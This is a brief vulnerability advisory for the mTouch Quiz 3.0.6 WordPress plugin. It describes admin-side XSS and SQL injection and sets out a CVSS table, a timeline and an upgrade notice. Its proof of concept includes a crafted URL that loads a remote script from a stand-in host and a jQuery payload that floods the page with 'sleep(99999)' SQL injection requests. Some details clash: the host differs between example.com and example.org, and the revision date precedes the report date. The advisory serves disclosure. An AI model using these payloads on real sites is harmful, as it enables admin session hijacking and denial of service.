Admin XSS and SQLi in mTouch Quiz 3.0.6

Vulnerability

Last revised: February 21, 2014

There are two unescaped outputtings of a GET parameter and one unescaped SQL query using the same GET parameter in question.php (lines 87, 94, and 117, respectively).

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	9 High
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	Complete
Integrity	Partial
Availability	Complete

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Create a JavaScript file (see below), and assume you’ve hosted it at http://example.com/naughty.js
Direct a logged-in admin to http://localhost/wp-admin/edit.php?page=mtouch-quiz/question.php&quiz=%3Cscript%20src=http://example.org/naughty.js%3E%3C/script%3E

jQuery(function ($) {
    for (var i = 0; i <= 20; i++) {
        $('body').append('<iframe src="/wp-admin/edit.php?page=mtouch-quiz/question.php&quiz=sleep(99999)&a='+i+'"></iframe>')
    }
})

Advisory timeline

2013-08-09: Discovered
2014-02-26: Reported
2014-03-17: Updated version discovered which reports issue fixed.

Mitigation/further actions

Upgrade immediately.

dxw advisories

Advisory: